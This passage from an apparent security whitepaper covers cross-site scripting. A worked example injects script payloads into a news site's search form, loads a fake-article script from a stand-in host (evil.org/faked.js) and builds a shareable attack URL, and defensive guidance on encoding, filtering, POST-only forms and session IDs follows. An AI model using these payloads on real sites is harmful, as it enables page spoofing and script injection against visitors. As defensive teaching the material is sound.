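console.log(postToGetUrl("http://www.anonymous.com/Search", "dropnav=Pick+a+section&q=test"));
// http://www.anonymous.com/Search?dropnav=Pick+a+section&q=test
```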
Putting It All Together

To bring together many of the ideas and processes discussed earlier in this document, consider the following example. In this example, the anonymous site has a search engine that responds to client data submissions. Normally the site returns an ordinary search results page. In our first test, we submit our first test string, <script>alert('CSS Vulnerable')</script>, and notice a strange response in the “Your Search” box on the left of the returned page. Taking a closer look at the content source, we notice that our sample code appears 21 times in the document, in various formats. It appears 10 times in a format similar to:

<SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>

9 times in a format similar to:

<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript%3E&pager.offset=10">2</a>

And twice in a format similar to:

document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\

"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>'); Obviously there are three different server-side processing routines for processing client search data. In the first type (ad.uk.doubleclick.net format), it appears that the processing routine changes the case of characters and changes white space to the underscore (“_”). The second type (href=) converts special characters into their escape-encoded formats, and white space into the “+” character. The third type (document.writeln) places the complete string within a document.writeln JavaScript routine. Several opportunities present themselves here. To make the site execute the JavaScript alert box for each type, we need to force the <script> tags outside of any other HTML tags. Thus, for each type, the following methods will work: ><script>alert('CSS Vulnerable')</script><b a=a a></a><script>alert('CSS Vulnerable')</script> \'><script>alert%28\'CSS Vulnerable\'%29</script>< The result is the following alert box (multiple times): However, for this example, we shall focus on the last type (document.writeln). Since it is possible to inject code into the returned HTML page to the anonymous News site, to make the attack interesting, we shall “write” our own fake news article. Due to the maximum length of any string we can send to the site, and the likely length of the fake news article, we shall create a JavaScript include file (.js) which we will load in to the page using: \'><script%20src%3dhttp://evil.org/faked.js></script> In this example, the include file will use multiple document.write statements to create the fake news article. There are several key features to the include file, and include - Use of HTML <DIV> tags to position the content on the page. Doing so allows the attacker to cover over existing content as they wish.

Using a table to keep all the article text together.

Rewriting of the URL source field at the top of the browser.

Rewriting of the browser status bar.

From the first few lines of the faked.js file:

var d = document;
// Absolutely positioned layer drawn over the genuine page content
d.write('<DIV id="fake" style="position:absolute; left:200px; top:200px; z-index:2">' +
        '<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');
d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');

So far, everything we have tested on the site makes use of the existing form to submit the attacker’s code. This submission is done through an HTTP POST request, such as:

POST /Search HTTP/1.0
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
Content-Length: 135
Pragma: no-cache

dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js></script>&newSearch=true&pro=IT&searchOption=articles

It is a simple process to convert the HTTP POST into a single URL. Unfortunately for the anonymous news site, the web application does not distinguish between data received by POST and by GET. Thus the following attack URL allows the attacker to place his own content “on” the site.

http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js></script>&newSearch=true&pro=IT&searchOption=articles

Defending Against the Attack

Solutions for Users

The only clear-cut solution for the user is to disable all scripting languages on their computer. Unfortunately, doing so is highly likely to remove much of the functionality of the sites they regularly visit. Thus users should only pursue this option if they require the highest possible level of protection. Alternatively, users must be selective as to the sites they trust and the sources of URL links. Note also that disabling scripting languages will not prevent attackers from influencing the appearance of content provided by trusted sites by embedding other HTML tags in the URL link.

With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker’s web site may still use scripted code to alter the representation of the links in the client browser.

Unfortunately, many integrated applications increase the threat of scripting code being executed on the user’s system, particularly through the use of embedded objects such as Flash! .swf files. To prevent these types of attacks, users must either uninstall the interpreters or ensure their protection systems are capable of stopping the execution of such content. It is envisaged that popular anti-virus and personal intrusion detection systems will eventually be capable of this.

Frankly, the onus for protecting users against code insertion and CSS type attacks rests upon the development of secure server-side applications. Ideally, the application should correctly handle and filter submitted data. Unfortunately, the likelihood that the application developer will miss some subtle character representation is quite high.

Solutions for Developers and Organisations

As no two applications are ever the same, application developers will need to tune their security countermeasures according to business requirements. The key to preventing applications from being vulnerable to code injection and CSS type attacks is to ensure that dynamically generated page content does not contain undesired HTML tags. The most likely sources of malicious data are:

Query strings

URLs and pieces of URLs

Posted data

Cookies

Persistent data supplied by users, and retrieved at a later date (such as from databases)

The following methods or design considerations can be implemented by developers to better secure their application against HTTP based attacks, not just CSS.

Limit Server Responses

In many cases it may be possible to limit the amount of “personalised” data that will be returned to client browsers through the use of generic responses.

For example, consider a site that displays the greeting “Hello, Gunter!” in response to http://trusted.org/greeting.jsp?name=Gunter. From a security standpoint it would be preferable to replace this dynamic response with a hard-coded response such as “Hello, User!”

Enforce Response Lengths

For the majority of applications, the developer should be able to limit the maximum length of any user-supplied strings. Even where these limits are initially enforced at the client side, all strings should also be checked at the server side. Where possible, enforce the maximum necessary string length by truncating any longer strings.

HTTP Referer

As part of the HTTP standard, provision is made for a header field called “Referer”. When a client browser follows a link or submits form data, the referer field should contain the URL of the page that the link or data came from. If possible, the web application should check the referer field and reject data if it did not come from the correct host or link.

HTTP Referer

Usually appearing in the header of HTTP requests:

Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com

Advantages: An attack delivered through a link or form on another site would fail irrespective of any character or HTML tag filtering policies.

Disadvantages: There is a risk of blocking legitimate links and form submissions.

As the referer field is optional, rejecting a blank referer field would prevent the application from supporting certain client browsers.

In some cases, the referer field may be blank or missing if the user followed a link that may be referenced locally (e.g. email messages, cached pages and favourites).

Some browsers deliberately clear the referer field when navigating from a secure (HTTPS) page to an unsecured (HTTP) page.

Embedded Files and Objects

As witnessed by the Flash! attack, attackers may be capable of embedding scripting components that can be interpreted by the client web browser and used to conduct a CSS attack.

For inclusion within an HTML-based document, embedded files and objects are referenced using the HTML <EMBED> and <OBJECT> tags. Several options are available for decreasing the threat of embedded CSS attacks:

The safest option is to treat <EMBED> and <OBJECT> tags the same as <SCRIPT> tags, and reject any submitted content that contains such strings.

Depending upon the format of the embedded object, it may be possible to filter it based upon its content. For instance, with Flash! files, it would be possible to remove all instances where a getURL() call contains a reference to a site other than the current application host. Alternatively, it may be possible to specify the target window as “_blank” and thus stop any potential scripting code from being executed under the hosting domain’s privileges.

HTTP POST not GET

In the majority of cases, remote code insertion attacks are likely to be delivered through the submission of user data in HTML forms. One prevention step is to ensure that form submission is only ever done through HTTP POST requests. Allowing submissions through HTTP GET requests potentially allows attackers to craft distributable URLs containing the offending code.
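A minimal sketch of the POST-only rule, written in JavaScript for Node.js. The function names readPostedForm and createSearchServer, the 405 status and the response text are illustrative assumptions, not part of any particular framework; the point is that form fields are read only from the urlencoded request body, and a GET request carrying the same fields in its query string is refused.

```javascript
const http = require("http");

// Hypothetical helper: accept form fields only from the body of a POST
// request. Query-string parameters are never consulted, so a crafted GET
// link cannot deliver the data.
function readPostedForm(method, body) {
  if (String(method).toUpperCase() !== "POST") {
    return { status: 405, fields: null }; // 405 Method Not Allowed
  }
  // URLSearchParams decodes application/x-www-form-urlencoded data,
  // including "+" as a space.
  return { status: 200, fields: Object.fromEntries(new URLSearchParams(body)) };
}

// Example wiring into Node's built-in http server (not started here).
function createSearchServer() {
  return http.createServer((req, res) => {
    let body = "";
    req.setEncoding("utf8");
    req.on("data", (chunk) => { body += chunk; });
    req.on("end", () => {
      const result = readPostedForm(req.method, body);
      if (result.fields === null) {
        res.writeHead(405, { Allow: "POST" });
        res.end();
        return;
      }
      res.writeHead(200, { "Content-Type": "text/plain; charset=utf-8" });
      res.end("Received fields: " + Object.keys(result.fields).join(", ") + "\n");
    });
  });
}
```

createSearchServer() only constructs the server; calling listen() on the result would start it. A production handler would also cap the size of the request body.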

When coding the server-side application, it is extremely important to ensure that the client-side data can only be received through HTTP POST variables. Most web application environments indicate the method by which each variable was delivered.

HTTP POST not GET

Forcing the use of HTTP POST over GET is a simple process and easy to implement.

Advantages: Almost always removes the threat of URL-based code insertion attacks.

Disadvantages: Application users may not be able to save URLs to their favourites for quick access to the application component.

Cookie Inspection

Many applications use cookies for managing the state of the communication, and for local storage of information relevant to the user. Application developers must ensure that all cookie information is thoroughly checked and filtered before insertion into HTML documents. Attackers who modify persistent cookies can also make their attacks persistent.

URL Session Identifier

In some circumstances, issuing a unique session identifier to each valid user can prevent remote exploitation of URL-based code insertion attacks.

As a user arrives at the web site, they are automatically allocated a unique session ID. This session ID can ONLY be obtained from one page on the site (usually the start/home page). Should a visitor try to access any other page within the site without a valid session ID, they are automatically redirected to the start page and issued one.

Should an attacker discover a CSS flaw in one application component, any crafted exploit URL will have to contain a valid session ID. By rigorously controlling the session ID timeout, the application ensures that the attacker cannot make use of the flaw (other than affecting the attacker locally) outside of this period.
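The session identifier scheme described above can be sketched as follows, again in JavaScript for Node.js. The in-memory Map store, the 15-minute lifetime and the function names are hypothetical choices for illustration; a real application would normally rely on its platform's session facilities. The sketch also keeps a SHA-256 hash of the client's IP address alongside each ID, a server-side variant of the IP checksum idea, rather than embedding that hash in the identifier itself.

```javascript
const crypto = require("crypto");

// Hypothetical parameters for this sketch.
const SESSION_LIFETIME_MS = 15 * 60 * 1000; // 15-minute timeout
const sessions = new Map(); // session ID -> { issuedAt, ipHash }

function hashIp(ip) {
  return crypto.createHash("sha256").update(String(ip)).digest("hex");
}

// Called only from the start/home page: allocate an unpredictable ID.
function issueSessionId(clientIp, now = Date.now()) {
  const id = crypto.randomBytes(16).toString("hex");
  sessions.set(id, { issuedAt: now, ipHash: hashIp(clientIp) });
  return id;
}

// Called by every other page. A false result means the visitor should be
// redirected to the start page and issued a new ID.
function isValidSession(id, clientIp, now = Date.now()) {
  const entry = sessions.get(id);
  if (entry === undefined) {
    return false; // unknown or forged ID
  }
  if (now - entry.issuedAt > SESSION_LIFETIME_MS) {
    sessions.delete(id); // expired: exploit URLs carrying this ID stop working
    return false;
  }
  // Optional IP binding: an ID replayed from another address is refused.
  return entry.ipHash === hashIp(clientIp);
}
```

Because the timeout here is measured from the time of issue, an exploit URL built around one ID stops working once that ID expires; a sliding timeout refreshed on each request would be an equally reasonable design.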

For additional security, the session ID could also be made to include a hashed version (or checksum) of the client browser’s IP address.

URL Session Identifier

URL session identifiers are often visible as:

http://trusted.org/app.jsp?session=h3uf8309ai9.830988

Advantages: Likely to stop all long-term insertion attacks.

With the addition of IP address information, session IDs implemented this way will stop all URL-based code insertion attacks.

Disadvantages: It is likely that the session ID will be allocated, and used, over HTTP. This session ID will thus be sent in the clear and will appear in most logging systems (e.g. firewalls, proxies etc.). Developers must ensure that a different session ID is allocated and used during secure transactions.

This security measure can still be defeated by man-in-the-middle type attacks.

Character Sets

The success of code injection attacks relies heavily on the use of non-alphanumeric characters. Some small measure of security can be gained by ensuring that data is interpreted using an appropriate, explicitly declared character set.

Character Sets

A popular character set is ISO 8859-1, which was the default in early versions of HTML and HTTP.

Ensure all content pages include the following:

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

Advantages: Character submission is limited by the client web browser itself.

Can potentially reduce the amount of client-side code required to check user-supplied text, and thus the total size of the HTML content, making for faster download times.

Disadvantages: Can be easily bypassed.

Will have an effect on character localisation.

Dangerous Content

Certain characters are of special significance when inserted into web pages or URL content. Their significance depends upon the HTML specifications, context and browser interpretation. If input to the application (or web site) is not correctly validated, the following problems may occur:

Session information from client cookies may be set and read,

User input could be intercepted,

Data integrity can be compromised,

Foreign scripting components can be executed by the client browser in the context of the trusted source.

Character      Significance

<              The less-than character introduces an HTML tag.
>              The greater-than character is sometimes interpreted by client browsers as the end of an HTML tag, the browser assuming that the page author omitted an opening < in error.
"              The double quote character is often interpreted as the end of an attribute value.
%              The percent character is frequently used for encoding characters, such as their Unicode representation.
&              The ampersand introduces a character entity. It is possible to combine the double quote and ampersand characters (“& “ extravalue”) to combine character entities within an HTML tag. Within a URL, the & separates query-string parameters. It is also often used by UNIX-based operating systems for command execution.
'              HTML tag attribute values can be enclosed within single quotes.
SPACE          Although most good developers prefer to quote attribute values, the quotes may be omitted entirely, in which case white-space characters separate the values. The SPACE character can be used as white-space. When used within URL information, the SPACE character is interpreted as the end of a URL.
TAB            Following the same white-space principles as the SPACE character, TAB may also be used. When used within URL information, the TAB character is interpreted as the end of a URL.
; | !          Semicolon, pipe and exclamation characters can be used for additional command execution.
-              The dash (or minus sign) can be used in database queries, and in the creation of negative numbers.
/ \            The forward slash and backslash are often used for faking paths and queries.
( ) { } [ ]    Round, curly and square brackets are often used to delimit script, program or regular expressions.
*              Often used in database queries to mean “all”.
? $ @ :        Question mark, dollar, at and colon characters are often used as script or programming markers.
Hex Version    The hex value of a character may be used, often for non-printable characters, such as:
               x00  Null bytes for truncating strings
               x04  EOT (end of transmission), used as EOF for faking the end of files
               x08  Backspace
               x0a  Line feed (new line) for extra command execution
               x0d  Carriage return for extra command execution
               x1b  Escape character for breaking out of procedures
               x20  Spaces for faking URLs and other names
               x7f  Delete
Non-ASCII      Within a URL, non-ASCII characters (character values of 128 and above in the ISO 8859-1 encoding) are not allowed.

When dealing with potentially dangerous user-supplied data, organisations may approach the problem from three different angles:

Encode output based upon input parameters.

Filter input parameters for special characters.

Filter output based upon input parameters for special characters.

Applying the appropriate solution efficiently depends upon the language used to code the server-side application. Depending upon the application, and the particular phase of operation, it may be necessary to use different techniques to handle the special characters. In most instances input or output filtering will be sufficient. However, if particular client data submissions are likely to contain special characters (e.g. a complex database search query), it may be necessary to encode the resultant data for presentation back to the client.

Encode output based upon input parameters

In this method, any non-validated user data is always encoded to the appropriate HTML character entities as it is written back to the user. For instance, the character “<” would be encoded as “&lt;” and, although appearing to the user as the less-than character, would not be interpreted by the client browser as the start of an HTML tag. If a web page uses the UTF-7 character encoding, there are several different strings that will act as a ‘<’ character and start an HTML tag; all of these strings start with a ‘+’. It is also important that use of the “%” encoding character be carefully monitored, as it can be used to escape-encode or Unicode-encode special characters that will be correctly interpreted by the client web browser. There are many methods of encoding text and special characters. A detailed analysis can be found in the earlier paper, “URL Encoded Attacks”.

Encode output based upon input parameters

Microsoft Active Server Pages

<%

// Assumes the page's scripting language is set to JScript.
var BaseURL = "http://www.mysite.com/search2.asp?searchagain=";
// URL-encode the search term before placing it inside the link
Response.Write("<a href=\"" + BaseURL +
    Server.URLEncode(Request.QueryString("SearchString")) +
    "\">click-me</a>");
%>

<% // HTML-encode the posted user name before writing it into the page
Response.Write("Hello visitor <I>" +
    Server.HTMLEncode(Request.Form("UserName")) +
    "</I>"); %>

With Microsoft’s ASP, the Server.HTMLEncode call converts special characters in the user name (such as < and >) into HTML character entities, so any script it contains is displayed rather than executed.

Filter input parameters for special characters

Input filtering works by removing some or all special characters from user-supplied data as it reaches the server-side application components. Although it is possible to implement client-side input filtering, this should never be relied upon, as it is often a trivial exercise for an attacker to bypass it. Even if filtering is implemented at the client side, the server-side processes should carry out the same input filtering. The recommended method of implementing input filtering is to select only from the set of characters known to be safe, rather than excluding the named special characters. This method is referred to as positive filtering; by only selecting the characters that are acceptable, it helps to reduce the ability to exploit other, as yet unknown, vulnerabilities. For example, a form field that is expecting a person's age can be limited to the set of digits 0 through 9. There is no reason for this age element to accept any letters or other special characters.

Filter output based upon input parameters for special characters

Output filtering functions similarly to input filtering, except that special characters are filtered from the data at the server-side application before being sent to the client web browser. This technique should be used when data is retrieved from databases or other storage formats, particularly when there is a probability that non-filtered content could have been added by other applications or system processes. Special care should be taken when using output filtering. If the application outputs HTML content, vigilance is required to ensure that special character filtering is restricted to data that has been previously supplied by a user and stored in a database.
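The three approaches can be sketched in JavaScript as follows. The function names, the one-to-three-digit age rule and the allow-listed character set for stored values are assumptions made for illustration only. In each case only the user-derived value passes through the encoder or filter, while the page's own markup is written out unchanged.

```javascript
// Encode output: replace HTML-significant characters with character
// entities, so the browser displays them instead of treating them as markup.
function htmlEncode(text) {
  return String(text)
    .replace(/&/g, "&amp;") // first, so the entities added below are not re-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Positive input filtering: accept an age only if it consists of one to
// three digits; anything else is rejected rather than "cleaned".
function filterAge(input) {
  return /^[0-9]{1,3}$/.test(String(input)) ? Number(input) : null;
}

// Output filtering: keep only an allow-listed set of characters in a value
// read back from storage (hypothetical set: letters, digits, space . , -).
function filterStoredValue(value) {
  return String(value).replace(/[^A-Za-z0-9 .,\-]/g, "");
}

// Only the user-derived values are encoded or filtered; the page's own
// tags (<p>, <i>) are left intact.
function renderSearchEcho(query) {
  return "<p>You searched for: " + htmlEncode(query) + "</p>";
}

function renderGreeting(storedName) {
  return "<p>Hello, <i>" + filterStoredValue(storedName) + "</i></p>";
}
```

Encoding preserves what the user typed while making it inert; filtering discards characters outright, which suits fields such as an age where no special character is ever legitimate.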
Filtering the special characters “<” and “>” too early in the process is likely to render the client HTML document useless.

References

“Malicious HTML Tags Embedded in Client Web Requests”, CERT® Advisory CA-2000-02, February 3 2002

“Bypassing JavaScript Filters – the Flash! attack”, EyeonSecurity, June 5 2002

“The HTML Form Protocol Attack”, Jochen Topf, August 8 2001

“HOWTO: Prevent Cross-Site Scripting Security Issues (Q252985)”, Microsoft, February 1 2000

“Understanding Malicious Content Mitigation for Web Developers”, CERT Coordination Center, February 2 2000

“URL Encoded Attacks”, Internet Security Systems, Gunter Ollmann, April 1 2002

“Cross-site Scripting Overview”, Microsoft, February 2 2000

“The Evolution of Cross-site Scripting Attacks”, iDefence, David Endler, May 20 2002